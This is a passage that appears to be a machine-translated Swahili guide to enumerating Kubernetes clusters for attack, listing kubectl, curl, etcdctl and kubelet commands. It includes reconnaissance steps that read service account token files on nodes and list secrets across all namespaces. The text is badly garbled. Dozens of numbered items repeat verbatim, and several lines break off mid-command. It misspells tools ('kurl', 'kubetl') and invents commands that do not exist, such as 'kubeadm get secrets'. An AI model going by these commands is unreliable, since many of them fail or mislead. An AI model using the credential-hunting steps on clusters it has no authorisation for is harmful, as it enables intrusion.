    kubectl get <RESOURCE_TYPE> <RESOURCE_NAME> -n <NAMESPACE> -o json

    1.41. Tumia kubetcl kuchunguza rasilimali kwa muundo wa YAML kwa uga fulani kwa jina fulani:

    kubectl get <RESOURCE_TYPE> <RESOURCE_NAME> -n <NAMESPACE> -o yaml

    1.42. Tumia kubetcl kuchunguza rasilimali kwa muundo wa JSON kwa uga fulani kwa jina fulani:

    kubectl get <RESOURCE_TYPE> <RESOURCE_NAME> -n <NAMESPACE> -o json

    1.43. Tumia kubetcl kuchunguza rasilimali kwa muundo wa YAML kwa uga fulani kwa jina fulani:

    kubectl get <RESOURCE_TYPE> <RESOURCE_NAME> -n <NAMESPACE> -o yaml

    1.44. Tumia kubetcl kuchunguza rasilimali kwa muundo wa JSON kwa uga fulani kwa jina fulani:

    kubectl get <RESOURCE_TYPE> <RESOURCE_NAME> -n <NAMESPACE> -o json

    1.45. Tumia kubetcl kuchunguza rasilimali kwa muundo wa YAML kwa uga fulani kwa jina fulani:

    kubectl get <RESOURCE_TYPE> <RESOURCE_NAME> -n <NAMESPACE> -o yaml

    1.46. Tumia kubetcl kuchunguza rasilimali kwa muundo wa JSON kwa uga fulani kwa jina fulani:

    kubectl get <RESOURCE_TYPE> <RESOURCE_NAME> -n <NAMESPACE> -o json

    1.47. Tumia kubetcl kuchunguza rasilimali kwa muundo wa YAML kwa uga fulani kwa jina fulani:

    kubectl get <RESOURCE_TYPE> <RESOURCE_NAME> -n <NAMESPACE> -o yaml

    1.48. Tumia kubetcl kuchunguza rasilimali kwa muundo wa JSON kwa uga fulani kwa jina fulani:

    kubectl get <RESOURCE_TYPE> <RESOURCE_NAME> -n <NAMESPACE> -o json

    1.49. Tumia kubetcl kuchunguza rasilimali kwa muundo wa YAML kwa uga fulani kwa jina fulani:

    kubectl get <RESOURCE_TYPE> <RESOURCE_NAME> -n <NAMESPACE> -o yaml

    1.50. Tumia kubetcl kuchunguza rasilimali kwa muundo wa JSON kwa uga fulani kwa jina fulani:

    kubectl get <RESOURCE_TYPE> <RESOURCE_NAME> -n <NAMESPACE> -o json

    1.51. Tumia kubetcl kuchunguza rasilimali kwa muundo wa YAML kwa uga fulani kwa jina fulani:

    kubectl get <RESOURCE_TYPE> <RESOURCE_NAME> -n <NAMESPACE> -o yaml

    1.52. Tumia kubetcl kuchunguza rasilimali kwa muundo wa JSON kwa uga fulani kwa jina fulani:

    kubectl get <RESOURCE_TYPE> <RESOURCE_NAME> -n <NAMESPACE> -o json

    1.53. Tumia kubetcl kuchunguza rasilimali kwa muundo wa YAML kwa uga fulani kwa jina fulani:

    kubectl get <RESOURCE_TYPE> <RESOURCE_NAME> -n <NAMESPACE> -o yaml

    1.54. Tumia kubetcl kuchunguza rasilimali kwa muundo wa JSON kwa uga fulani kwa jina fulani:

    kubectl get <RESOURCE_TYPE> <RESOURCE_NAME> -n <NAMESPACE> -o json

    1.55. Tumia kubetcl kuchunguza rasilimali kwa muundo wa YAML kwa uga fulani kwa jina fulani:

    kubectl get <RESOURCE_TYPE> <RESOURCE_NAME> -n <NAMESPACE> -o yaml

    1.56. Tumia kubetcl kuchunguza rasilimali kwa muundo wa JSON kwa uga fulani kwa jina fulani:

    kubectl get <RESOURCE_TYPE> <RESOURCE_NAME> -n <NAMESPACE> -o json

    1.57. Tumia kubetcl kuchunguza rasilimali kwa muundo wa YAML kwa uga fulani kwa jina fulani:

    kubectl get <RESOURCE_TYPE> <RESOURCE_NAME> -n <NAMESPACE> -o yaml

    1.58. Tumia kubetcl kuchunguza rasilimali kwa muundo wa JSON kwa uga fulani kwa jina fulani:

    kubectl get <RESOURCE_TYPE> <RESOURCE_NAME> -n <NAMESPACE> -o json

    1.59. Tumia kubetcl kuchunguza rasilimali kwa muundo wa YAML kwa uga fulani kwa jina fulani:

    kubectl get <RESOURCE_TYPE> <RESOURCE_NAME> -n <NAMESPACE> -o yaml

    1.60. Tumia kubetcl kuchunguza rasilimali kwa muundo wa JSON kwa uga fulani kwa jina fulani:

    kubectl get <RESOURCE_TYPE
kurl -v https://$APISERVER/api/v1/namespaces/<namespace>/deployments/

Pata Pods

Pods ni makontena halisi ambayo yatakuwa yakifanya kazi.

k get pods
k get pods -n custnamespace

Uchunguzi wa Kubernetes

  1. Kutumia kubectl

    • kubectl get pods

    • kubectl get deployments

    • kubectl get services

    • kubectl get configmaps

    • kubectl get secrets

    • kubectl get pv

    • kubectl get pvc

    • kubectl get nodes

    • kubectl get namespaces

    • kubectl get roles

    • kubectl get rolebindings

    • kubectl get clusterroles

    • kubectl get clusterrolebindings

    • kubectl get events

  2. Kutumia kubetl

    • kubetl get pods

    • kubetl get deployments

    • kubetl get services

    • kubetl get configmaps

    • kubetl get secrets

    • kubetl get pv

    • kubetl get pvc

    • kubetl get nodes

    • kubetl get namespaces

    • kubetl get roles

    • kubetl get rolebindings

    • kubetl get clusterroles

    • kubetl get clusterrolebindings

    • kubetl get events

  3. Kutumia kubens

    • kubens

    • kubens -h

  4. Kutumia kubectx

    • kubectx

    • kubectx -h

  5. Kutumia kubectx na kubens

    • kubectx

    • kubens

  6. Kutumia kubectx na kubens kwa njia ya kifupi

    • kubectx

    • kubens

  7. Kutumia kubectx na kubens kwa njia ya kifupi

    • kubectx

    • kubens

  8. Kutumia kubectx na kubens kwa njia ya kifupi

    • kubectx

    • kubens

  9. Kutumia kubectx na kubens kwa njia ya kifupi

    • kubectx

    • kubens

  10. Kutumia kubectx na kubens kwa njia ya kifupi

    • kubectx

    • kubens

  11. Kutumia kubectx na kubens kwa njia ya kifupi

    • kubectx

    • kubens

  12. Kutumia kubectx na kubens kwa njia ya kifupi

    • kubectx

    • kubens

  13. Kutumia kubectx na kubens kwa njia ya kifupi

    • kubectx

    • kubens

  14. Kutumia kubectx na kubens kwa njia ya kifupi

    • kubectx

    • kubens

  15. Kutumia kubectx na kubens kwa njia ya kifupi

    • kubectx

    • kubens

  16. Kutumia kubectx na kubens kwa njia ya kifupi

    • kubectx

    • kubens

  17. Kutumia kubectx na kubens kwa njia ya kifupi

    • kubectx

    • kubens

  18. Kutumia kubectx na kubens kwa njia ya kifupi

    • kubectx

    • kubens

  19. Kutumia kubectx na kubens kwa njia ya kifupi

    • kubectx

    • kubens

  20. Kutumia kubectx na kubens kwa njia ya kifupi

    • kubectx

    • kubens

  21. Kutumia kubectx na kubens kwa njia ya kifupi

    • kubectx

    • kubens

  22. Kutumia kubectx na kubens kwa njia ya kifupi

    • kubectx

    • kubens

  23. Kutumia kubectx na kubens kwa njia ya kifupi

    • kubectx

    • kubens

  24. Kutumia kubectx na kubens kwa njia ya kifupi

    • kubectx

    • kubens

  25. Kutumia kubectx na kubens kwa njia ya kifupi

    • kubectx

    • kubens

  26. Kutumia kubectx na kubens kwa njia ya kifupi

    • kubectx

    • kubens

  27. Kutumia kubectx na kubens kwa njia ya kifupi

    • kubectx

    • kubens

  28. Kutumia kubectx na kubens kwa njia ya kifupi

    • kubectx

    • kubens

  29. Kutumia kubectx na kubens kwa njia ya kifupi

    • kubectx

    • kubens

  30. Kutumia kubectx na kubens kwa njia ya kifupi

    • kubectx

    • kubens

  31. Kutumia kubectx na kubens kwa njia ya kifupi

    • kubectx

    • kubens

  32. Kutumia kubectx na kubens kwa njia ya kifupi

    • kubectx

    • kubens

  33. Kutumia kubectx na kubens kwa njia ya kifupi

    • kubectx

    • kubens

  34. Kutumia kubectx na kubens kwa njia ya kifupi

    • kubectx

    • kubens

  35. Kutumia kubectx na kubens kwa njia ya kifupi

    • kubectx

    • kubens

  36. Kutumia kubectx na kubens kwa njia ya kifupi

    • kubectx

    • kubens

  37. Kutumia kubectx na kubens kwa njia ya kifupi

    • kubectx

    • kubens

  38. Kutumia kubectx na kubens kwa njia ya kifupi

    • kubectx

    • kubens

  39. Kutumia kubectx na kubens kwa njia ya kifupi

    • kubectx

    • kubens

  40. Kutumia kubectx na kubens kwa njia ya kifupi

    • kubectx

    • kubens

  41. Kutumia kubectx na kubens kwa njia ya kifupi

    • kubectx

    • kubens

  42. Kutumia kubectx na kubens kwa njia ya kifupi

    • kubectx

    • kubens

  43. Kutumia kubectx na kubens kwa njia ya kifupi

    • kubectx

    • kubens

  44. Kutumia kubectx na kubens kwa njia ya kifupi

    • kubectx

    • kubens

  45. Kutumia kubectx na kubens kwa njia ya kifupi

    • kubectx

    • kubens

  46. Kutumia kubectx na kubens kwa njia ya kifupi

    • kubectx

    • kubens

  47. Kutumia kubectx na kubens kwa njia ya kifupi

    • kubectx

    • kubens

  48. Kutumia kubectx na kubens kwa njia ya kifupi

    • kubectx

    • kubens

  49. Kutumia kubectx na kubens kwa njia ya kifupi

    • kubectx

    • kubens

  50. Kutumia kubectx na kubens kwa njia ya kifupi

    • kubectx

    • kubens

kurl -v https://$APISERVER/api/v1/namespaces/<namespace>/pods/

Pata Huduma

Huduma za Kubernetes hutumiwa ku kufunua huduma katika bandari na IP maalum (ambayo itafanya kazi kama balansa ya mzigo kwa makodipo ambayo kimsingi yanatoa huduma). Hii ni muhimu kujua mahali unaweza kupata huduma zingine za kujaribu kushambulia.

k get services
k get services -n custnamespace

Uchunguzi wa Kubernetes

Kuchunguza API Server

  1. Kuchunguza API Server 1.1. Pata anwani ya API Server:

    kubectl cluster-info | grep 'Kubernetes master' | awk '/http/ {print $NF}'

    1.2. Hakikisha unaweza kufikia API Server:

    curl https://<API_SERVER_IP>:<API_SERVER_PORT>/version --insecure

  2. Kuchunguza Rasilimali za Kubernetes 2.1. Pata orodha ya rasilimali zinazopatikana:

    kubectl api-resources --verbs=list --namespaced -o name | xargs -n 1 kubectl get --show-kind --ignore-not-found

    2.2. Pata habari zaidi kuhusu rasilimali fulani:

    kubectl explain <RESOURCE>

  3. Kuchunguza Majina ya Nafasi za Kazi (Namespaces) 3.1. Pata orodha ya majina ya nafasi za kazi:

    kubectl get namespaces

    3.2. Pata rasilimali zilizopo katika nafasi ya kazi fulani:

    kubectl get all -n <NAMESPACE>

  4. Kuchunguza Majina ya Watumiaji (Service Accounts) 4.1. Pata orodha ya majina ya watumiaji:

    kubectl get serviceaccounts

    4.2. Pata maelezo zaidi kuhusu mtumiaji fulani:

    kubectl describe serviceaccount <SERVICE_ACCOUNT_NAME>

  5. Kuchunguza Majina ya Majukumu (Roles) na Kanuni (Role Bindings) 5.1. Pata orodha ya majukumu:

    kubectl get roles

    5.2. Pata orodha ya kanuni za jukumu fulani:

    kubectl get rolebindings -n <NAMESPACE>

  6. Kuchunguza Cheti (Certificate) za Kuingia 6.1. Pata orodha ya cheti za kuingia:

    kubectl get csr

    6.2. P Thibitisha cheti la kuingia:

    kubectl certificate approve <CSR_NAME>

  7. Kuchunguza Mipangilio ya Usalama 7.1. Pata mipangilio ya usalama ya kisasa:

    kubectl get podsecuritypolicies

    7.2. Pata maelezo zaidi kuhusu sera ya usalama:

    kubectl describe podsecuritypolicy <POD_SECURITY_POLICY_NAME>

  8. Kuchunguza Mipangilio ya Mtandao 8.1. Pata mipangilio ya mtandao:

    kubectl get networkpolicies

    8.2. Pata maelezo zaidi kuhusu sera ya mtandao:

    kubectl describe networkpolicy <NETWORK_POLICY_NAME>

  9. Kuchunguza Mipangilio ya Uhifadhi 9.1. Pata mipangilio ya uhifadhi:

    kubectl get storageclasses

    9.2. Pata maelezo zaidi kuhusu darasa la uhifadhi:

    kubectl describe storageclass <STORAGE_CLASS_NAME>

  10. Kuchunguza Mipangilio ya Kudhibiti Upatikanaji (Access Control) 10.1. Pata orodha ya sera za kudhibiti upatikanaji:

    kubectl get clusterroles

    10.2. Pata maelezo zaidi kuhusu sera ya kudhibiti upatikanaji:

    kubectl describe clusterrole <CLUSTER_ROLE_NAME>

  11. Kuchunguza Mipangilio ya Kudhibiti Upatikanaji wa Nafasi za Kazi (Namespace Access Control) 11.1. Pata orodha ya sera za kudhibiti upatikanaji wa nafasi za kazi:

    kubectl get clusterrolebindings

    11.2. Pata maelezo zaidi kuhusu sera ya kudhibiti upatikanaji wa nafasi za kazi:

    kubectl describe clusterrolebinding <CLUSTER_ROLE_BINDING_NAME>

  12. Kuchunguza Mipangilio ya Kudhibiti Upatikanaji wa Huduma (Service Account Access Control) 12.1. Pata orodha ya sera za kudhibiti upatikanaji wa huduma:

    kubectl get serviceaccount

    12.2. Pata maelezo zaidi kuhusu sera ya kudhibiti upatikanaji wa huduma:

    kubectl describe serviceaccount <SERVICE_ACCOUNT_NAME>

  13. Kuchunguza Mipangilio ya Kudhibiti Upatikanaji wa Cheti (Certificate Access Control) 13.1. Pata orodha ya sera za kudhibiti upatikanaji wa cheti:

    kubectl get certificatesigningrequests

    13.2. Pata maelezo zaidi kuhusu sera ya kudhibiti upatikanaji wa cheti:

    kubectl describe certificatesigningrequest <CSR_NAME>

  14. Kuchunguza Mipangilio ya Kudhibiti Upatikanaji wa Majukumu (Role Access Control) 14.1. Pata orodha ya sera za kudhibiti upatikanaji wa majukumu:

    kubectl get rolebindings

    14.2. Pata maelezo zaidi kuhusu sera ya kudhibiti upatikanaji wa majukumu:

    kubectl describe rolebinding <ROLE_BINDING_NAME>

  15. Kuchunguza Mipangilio ya Kudhibiti Upatikanaji wa Kanuni (Role Binding Access Control) 15.1. Pata orodha ya sera za kudhibiti upatikanaji wa kanuni:

    kubectl get rolebindings

    15.2. Pata maelezo zaidi kuhusu sera ya kudhibiti upatikanaji wa kanuni:

    kubectl describe rolebinding <ROLE_BINDING_NAME>

  16. Kuchunguza Mipangilio ya Kudhibiti Upatikanaji wa Mipangilio ya Kuingia (Certificate Signing Request Access Control) 16.1. Pata orodha ya sera za kudhibiti upatikanaji wa mipangilio ya kuingia:

    kubectl get certificatesigningrequests

    16.2. Pata maelezo zaidi kuhusu sera ya kudhibiti upatikanaji wa mipangilio ya kuingia:

    kubectl describe certificatesigningrequest <CSR_NAME>

  17. Kuchunguza Mipangilio ya Kudhibiti Upatikanaji wa Mipangilio ya Mtandao (Network Policy Access Control) 17.1. Pata orodha ya sera za kudhibiti upatikanaji wa mipangilio ya mtandao:

    kubectl get networkpolicies

    17.2. Pata maelezo zaidi kuhusu sera ya kudhibiti upatikanaji wa mipangilio ya mtandao:

    kubectl describe networkpolicy <NETWORK_POLICY_NAME>

  18. Kuchunguza Mipangilio ya Kudhibiti Upatikanaji wa Mipangilio ya Uhifadhi (Storage Class Access Control) 18.1. Pata orodha ya sera za kudhibiti upatikanaji wa mipangilio ya uhifadhi:

    kubectl get storageclasses

    18.2. Pata maelezo zaidi kuhusu sera ya kudhibiti upatikanaji wa mipangilio ya uhifadhi:

    kubectl describe storageclass <STORAGE_CLASS_NAME>

  19. Kuchunguza Mipangilio ya Kudhibiti Upatikanaji wa Mipangilio ya Mtandao (Network Policy Access Control) 19.1. Pata orodha ya sera za kudhibiti upatikanaji wa mipangilio ya mtandao:

    kubectl get networkpolicies

    19.2. Pata maelezo zaidi kuhusu sera ya kudhibiti upatikanaji wa mipangilio ya mtandao:

    kubectl describe networkpolicy <NETWORK_POLICY_NAME>

  20. Kuchunguza Mipangilio ya Kudhibiti Upatikanaji wa Mipangilio ya Uhifadhi (Storage Class Access Control) 20.1. Pata orodha ya sera za kudhibiti upatikanaji wa mipangilio ya uhifadhi:

    kubectl get storageclasses

    20.2. Pata maelezo zaidi kuhusu sera ya kudhibiti upatikanaji wa mipangilio ya uhifadhi:

    kubectl describe storageclass <STORAGE_CLASS_NAME>

  21. Kuchunguza Mipangilio ya Kudhibiti Upatikanaji wa Mipangilio ya Kuingia (Certificate Signing Request Access Control) 21.1. Pata orodha ya sera za kudhibiti upatikanaji wa mipangilio ya kuingia:

    kubectl get certificatesigningrequests

    21.2. Pata maelezo zaidi kuhusu sera ya kudhibiti upatikanaji wa mipangilio ya kuingia:

    kubectl describe certificatesigningrequest <CSR_NAME>

  22. Kuchunguza Mipangilio ya Kudhibiti Upatikanaji wa Mipangilio ya Mtandao (Network Policy Access Control) 22.1. Pata orodha ya sera za kudhibiti upatikanaji wa mipangilio ya mtandao:

    kubectl get networkpolicies

    22.2. Pata maelezo zaidi kuhusu sera ya kudhibiti upatikanaji wa mipangilio ya mtandao:

    kubectl describe networkpolicy <NETWORK_POLICY_NAME>

  23. Kuchunguza Mipangilio ya Kudhibiti Upatikanaji wa Mipangilio ya Uhifadhi (Storage Class Access Control) 23.1. Pata orodha ya sera za kudhibiti upatikanaji wa mipangilio ya uhifadhi:

    kubectl get storageclasses

    23.2. Pata maelezo zaidi kuhusu sera ya kudhibiti upatikanaji wa mipangilio ya uhifadhi:

    kubectl describe storageclass <STORAGE_CLASS_NAME>
kurl -v https://$APISERVER/api/v1/namespaces/default/services/

Pata nodes

Pata nodes zote zilizowekwa ndani ya kikundi.

k get nodes

Uchunguzi wa Kubernetes

Kuchunguza API Server

  1. Kuchunguza API Server Endpoint

    Pima kufikia kwa API server kutoka ndani ya kikasha cha Kubernetes:

    curl -k https://kubernetes.default.svc

    Pima kufikia kwa API server kutoka nje ya kikasha cha Kubernetes:

    curl -k https://<kubernetes-master-ip>

  2. Kutumia kubectl

    Tumia kubectl kuchunguza API server:

    kubectl get all --all-namespaces

  3. Kutumia kubeadm

    Tumia kubeadm kuchunguza API server:

    kubeadm config view

  4. Kutumia etcd

    Pata maelezo ya API server kutoka etcd:

    etcdctl get / --prefix --keys-only

Kuchunguza Nodes

  1. Kutumia kubectl

    Tumia kubectl kuchunguza nodes:

    kubectl get nodes

  2. Kutumia kubeadm

    Tumia kubeadm kuchunguza nodes:

    kubeadm get nodes

Kuchunguza Services

  1. Kutumia kubectl

    Tumia kubectl kuchunguza services:

    kubectl get services --all-namespaces

  2. Kutumia kubeadm

    Tumia kubeadm kuchunguza services:

    kubeadm get services

Kuchunguza Storage

  1. Kutumia kubectl

    Tumia kubectl kuchunguza storage classes:

    kubectl get storageclasses

  2. Kutumia kubeadm

    Tumia kubeadm kuchunguza storage classes:

    kubeadm get storageclasses

Kuchunguza RBAC

  1. Kutumia kubectl

    Tumia kubectl kuchunguza Role-Based Access Control (RBAC):

    kubectl get roles --all-namespaces

  2. Kutumia kubeadm

    Tumia kubeadm kuchunguza RBAC:

    kubeadm get rbac

Kuchunguza Network Policies

  1. Kutumia kubectl

    Tumia kubectl kuchunguza network policies:

    kubectl get networkpolicies --all-names

  2. Kutumia kubeadm

    Tumia kubeadm kuchunguza network policies:

    kubeadm get networkpolicies

Kuchunguza Ingress Resources

  1. Kutumia kubectl

    Tumia kubectl kuchunguza Ingress resources:

    kubectl get ingresses --all-namespaces

  2. Kutumia kubeadm

    Tumia kubeadm kuchunguza Ingress resources:

    kubeadm get ingresses

Kuchunguza ConfigMaps

  1. Kutumia kubectl

    Tumia kubectl kuchunguza ConfigMaps:

    kubectl get configmaps --all-namespaces

  2. Kutumia kubeadm

    Tumia kubeadm kuchunguza ConfigMaps:

    kubeadm get configmaps

Kuchunguza Secrets

  1. Kutumia kubectl

    Tumia kubectl kuchunguza secrets:

    kubectl get secrets --all-namespaces

  2. Kutumia kubeadm

    Tumia kubeadm kuchunguza secrets:

    kubeadm get secrets

Kuchunguza Persistent Volumes

  1. Kutumia kubectl

    Tumia kubectl kuchunguza persistent volumes:

    kubectl get persistentvolumes

  2. Kutumia kubeadm

    Tumia kubeadm kuchunguza persistent volumes:

    kubeadm get persistentvolumes

Kuchunguza Namespaces

  1. Kutumia kubectl

    Tumia kubectl kuchunguza namespaces:

    kubectl get namespaces

  2. Kutumia kubeadm

    Tumia kubeadm kuchunguza namespaces:

    kubeadm get namespaces

Kuchunguza Events

  1. Kutumia kubectl

    Tumia kubectl kuchunguza events:

    kubectl get events --all-namespaces

  2. Kutumia kubeadm

    Tumia kubeadm kuchunguza events:

    kubeadm get events

Kuchunguza Custom Resource Definitions (CRDs)

  1. Kutumia kubectl

    Tumia kubectl kuchunguza Custom Resource Definitions (CRDs):

    kubectl get crds

  2. Kutumia kubeadm

    Tumia kubeadm kuchunguza CRDs:

    kubeadm get crds

Kuchunguza API Resources

  1. Kutumia kubectl

    Tumia kubectl kuchunguza API resources:

    kubectl api-resources

  2. Kutumia kubeadm

    Tumia kubeadm kuchunguza API resources:

    kubeadm api-resources

Kuchunguza API Versions

  1. Kutumia kubectl

    Tumia kubectl kuchunguza API versions:

    kubectl api-versions

  2. Kutumia kubeadm

    Tumia kubeadm kuchunguza API versions:

    kubeadm api-versions

Kuchunguza CRDs

  1. Kutumia kubectl

    Tumia kubectl kuchunguza CRDs:

    kubectl get crds

  2. Kutumia kubeadm

    Tumia kubeadm kuchunguza CRDs:

    kubeadm get crds

Kuchunguza API Resources

  1. Kutumia kubectl

    Tumia kubectl kuchunguza API resources:

    kubectl api-resources

  2. Kutumia kubeadm

    Tumia kubeadm kuchunguza API resources:

    kubeadm api-resources

Kuchunguza API Versions

  1. Kutumia kubectl

    Tumia kubectl kuchunguza API versions:

    kubectl api-versions

  2. Kutumia kubeadm

    Tumia kubeadm kuchunguza API versions:

    kubeadm api-versions

Kuchunguza CRDs

  1. Kutumia kubectl

    Tumia kubectl kuchunguza CRDs:

    kubectl get crds

  2. Kutumia kubeadm

    Tumia kubeadm kuchunguza CRDs:

    kubeadm get crds

Kuchunguza API Resources

  1. Kutumia kubectl

    Tumia kubectl kuchunguza API resources:

    kubectl api-resources

  2. Kutumia kubeadm

    Tumia kubeadm kuchunguza API resources:

    kubeadm api-resources

Kuchunguza API Versions

  1. Kutumia kubectl

    Tumia kubectl kuchunguza API versions:

    kubectl api-versions

  2. Kutumia kubeadm

    Tumia kubeadm kuchunguza API versions:

    kubeadm api-versions

Kuchunguza CRDs

  1. Kutumia kubectl

    Tumia kubectl kuchunguza CRDs:

    kubectl get crds

  2. Kutumia kubeadm

    Tumia kubeadm kuchunguza CRDs:

    kubeadm get crds

Kuchunguza API Resources

  1. Kutumia kubectl

    Tumia kubectl kuchunguza API resources:

    kubectl api-resources

  2. Kutumia kubeadm

    Tumia kubeadm kuchunguza API resources:

    kubeadm api-resources

Kuchunguza API Versions

  1. Kutumia kubectl

    Tumia kubectl kuchunguza API versions:

    kubectl api-versions

  2. Kutumia kubeadm

    Tumia kubeadm kuchunguza API versions:

    kubeadm api-versions

Kuchunguza CRDs

  1. Kutumia kubectl

    Tumia kubectl kuchunguza CRDs:

    kubectl get crds

  2. Kutumia kubeadm

    Tumia kubeadm kuchunguza CRDs:

    kubeadm get crds

Kuchunguza API Resources

  1. Kutumia kubectl

    Tumia kubectl kuchunguza API resources:

    kubectl api-resources

  2. Kutumia kubeadm

    Tumia kubeadm kuchunguza API resources:

    kubeadm api-resources

Kuchunguza API Versions

  1. Kutumia kubectl

    Tumia kubectl kuchunguza API versions:

    kubectl api-versions

  2. Kutumia kubeadm

    Tumia kubeadm kuchunguza API versions:

    kubeadm api-versions

Kuchunguza CRDs

  1. Kutumia kubectl

    Tumia kubectl kuchunguza CRDs:

    kubectl get crds

  2. Kutumia kubeadm

    Tumia kubeadm kuchunguza CRDs:

    kubeadm get crds

Kuchunguza API Resources

  1. Kutumia kubectl

    Tumia kubectl kuchunguza API resources:

    kubectl api-resources

  2. Kutumia kubeadm

    Tumia kubeadm kuchunguza API resources:

    kubeadm api-resources

Kuchunguza API Versions

  1. Kutumia kubectl

    Tumia kubectl kuchunguza API versions:

    kubectl api-versions

  2. Kutumia kubeadm

    Tumia kubeadm kuchunguza API versions:

    kubeadm api-versions

Kuchunguza CRDs

  1. Kutumia kubectl

    Tumia kubectl kuchunguza CRDs:

    kubectl get crds

  2. Kutumia kubeadm

    Tumia kubeadm kuchunguza CRDs:

    kubeadm get crds

Kuchunguza API Resources

  1. Kutumia kubectl

    Tumia kubectl kuchunguza API resources:

    kubectl api-resources

  2. Kutumia kubeadm

    Tumia kubeadm kuchunguza API resources:

    kubeadm api-resources

Kuchunguza API Versions

  1. Kutumia kubectl

    Tumia kubectl kuchunguza API versions:

    kubectl api-versions

  2. Kutumia kubeadm

    Tumia kubeadm kuchunguza API versions:

    kubeadm api-versions

Kuchunguza CRDs

  1. Kutumia kubectl

    Tumia kubectl kuchunguza CRDs:

    kubectl get crds

  2. Kutumia kubeadm

    Tumia kubeadm kuchunguza CRDs:

    kubeadm get crds

Kuchunguza API Resources

  1. Kutumia kubectl

    Tumia kubectl kuchunguza API resources:

    kubectl api-resources

  2. Kutumia kubeadm

    Tumia kubeadm kuchunguza API resources:

    kubeadm api-resources

Kuchunguza API Versions

  1. Kutumia kubectl

    Tumia kubectl kuchunguza API versions:

    kubectl api-versions

  2. Kutumia kubeadm

    Tumia kubeadm kuchunguza API versions:

    kubeadm api-versions

Kuchunguza CRDs

  1. Kutumia kubectl

    Tumia kubectl kuchunguza CRDs:

    kubectl get crds

  2. Kutumia kubeadm

    Tumia kubeadm kuchunguza CRDs:

    kubeadm get crds

Kuchunguza API Resources

  1. Kutumia kubectl

    Tumia kubectl kuchunguza API resources:

    kubectl api-resources

  2. Kutumia kubeadm

    Tumia kubeadm kuchunguza API resources:

    kubeadm api-resources

Kuchunguza API Versions

  1. Kutumia kubectl

    Tumia kubectl kuchunguza API versions:

    kubectl api-versions

  2. Kutumia kubeadm

    Tumia kubeadm kuchunguza API versions:

kurl -v https://$APISERVER/api/v1/nodes/

Pata DaemonSets

DaeamonSets inaruhusu kuhakikisha kwamba pod maalum inaendeshwa kwenye nodes zote za kikundi (au zile zilizochaguliwa). Ikiwa unafuta DaemonSet pod zinazosimamiwa nayo pia zitaondolewa.

k get daemonsets

Uchunguzi wa Kubernetes

Kuchunguza API Server

  1. Kuomba habari ya kimsingi kutoka kwa API Server

    curl -k https://<kubernetes-apiserver>:<port>/version

  2. Kutumia kubectl kuchunguza API Server

    kubectl cluster-info
kubectl get pods --all-namespaces
kubectl get nodes
kubectl get namespaces

  3. Kutumia kubeadm kuchunguza API Server

    kubeadm config view

Kuchunguza Kubelet

  1. Kuomba habari kutoka kwa Kubelet

    curl -k https://<kubelet>:10250/pods

  2. Kutumia kubectl kuchunguza Kubelet

    kubectl get --raw /api/v1/namespaces/default/pods

Kuchunguza Kube-Proxy

  1. Kuomba habari kutoka kwa Kube-Proxy

    curl -k https://<kube-proxy>:10249/proxy

Kuchunguza Etcd

  1. Kuomba habari kutoka kwa Etcd

    etcdctl --endpoints=https://<etcd>:2379 member list

  2. Kutumia kubectl kuchunguza Etcd

    kubectl exec -it etcd-<etcd-pod-name> -- sh
etcdctl member list

Kuchunguza Service Account Tokens

  1. Kuchunguza Service Account Tokens kwenye Nodes

    find /var/lib/kubelet -name 'token.csv' -exec cat {} \;

  2. Kuchunguza Service Account Tokens kwenye Containers

    kubectl get pods --all-namespaces -o=jsonpath='{range .items[*]}{.metadata.name}{"\t"}{.spec.serviceAccountName}{"\n"}{end}'

Kuchunguza RBAC

  1. Kuchunguza Role Bindings

    kubectl get rolebindings --all-namespaces

  2. Kuchunguza Cluster Role Bindings

    kubectl get clusterrolebindings

  3. Kuchunguza Roles

    kubectl get roles --all-namespaces

  4. Kuchunguza Cluster Roles

    kubectl get clusterroles

Kuchunguza Network Policies

  1. Kuchunguza Network Policies

    kubectl get networkpolicies --all-namespaces

Kuchunguza Ingress Resources

  1. Kuchunguza Ingress Resources

    kubectl get ingresses --all-namespaces

Kuchunguza Persistent Volumes

  1. Kuchunguza Persistent Volumes

    kubectl get pv

Kuchunguza Storage Classes

  1. Kuchunguza Storage Classes

    kubectl get storageclasses

Kuchunguza Events

  1. Kuchunguza Events

    kubectl get events --all-namespaces

Kuchunguza Config Maps

  1. Kuchunguza Config Maps

    kubectl get configmaps --all-namespaces

Kuchunguza Secrets

  1. Kuchunguza Secrets

    kubectl get secrets --all-namespaces

Kuchunguza Custom Resource Definitions (CRDs)

  1. Kuchunguza CRDs

    kubectl get crds

Kuchunguza Helm Charts

  1. Kuchunguza Helm Charts

    helm ls --all-namespaces

Kuchunguza Open Policy Agent (OPA)

  1. Kuchunguza OPA Policies

    kubectl get configmaps -n kube-system

Kuchunguza Audit Logs

  1. Kuchunguza Audit Logs

    kubectl get events -n kube-system --sort-by='.metadata.creationTimestamp'

Kuchunguza Service Endpoints

  1. Kuchunguza Service Endpoints

    kubectl get endpoints --all-namespaces

Kuchunguza Helm Tiller

  1. Kuchunguza Helm Tiller

    kubectl get deploy -n kube-system tiller-deploy

Kuchunguza Prometheus Metrics

  1. Kuchunguza Prometheus Metrics

    kubectl port-forward -n monitoring prometheus-prometheus-oper-prometheus-<id> 9090

Kuchunguza Grafana Dashboards

  1. Kuchunguza Grafana Dashboards

    kubectl port-forward -n monitoring grafana-<id> 3000

Kuchunguza Kube-State-Metrics

  1. Kuchunguza Kube-State-Metrics

    kubectl port-forward -n monitoring kube-state-metrics-<id> 8080

Kuchunguza Kube-Proxy Metrics

  1. Kuchunguza Kube-Proxy Metrics

    kubectl port-forward -n kube-system kube-proxy-<id> 10249

Kuchunguza Kubelet Metrics

  1. Kuchunguza Kubelet Metrics

    kubectl port-forward -n kube-system kubelet-<node-name> 10250

Kuchunguza Etcd Metrics

  1. Kuchunguza Etcd Metrics

    kubectl port-forward -n kube-system etcd-<node-name> 2379

Kuchunguza CoreDNS Metrics

  1. Kuchunguza CoreDNS Metrics

    kubectl port-forward -n kube-system coredns-<id> 9153

Kuchunguza Kube-Controller-Manager Metrics

  1. Kuchunguza Kube-Controller-Manager Metrics

    kubectl port-forward -n kube-system kube-controller-manager-<id> 10252

Kuchunguza Kube-Scheduler Metrics

  1. Kuchunguza Kube-Scheduler Metrics

    kubectl port-forward -n kube-system kube-scheduler-<id> 10251

Kuchunguza Kube-API-Server Metrics

  1. Kuchunguza Kube-API-Server Metrics

    kubectl port-forward -n kube-system kube-apiserver-<id> 10249

Kuchunguza Kube-Proxy Metrics

  1. Kuchunguza Kube-Proxy Metrics

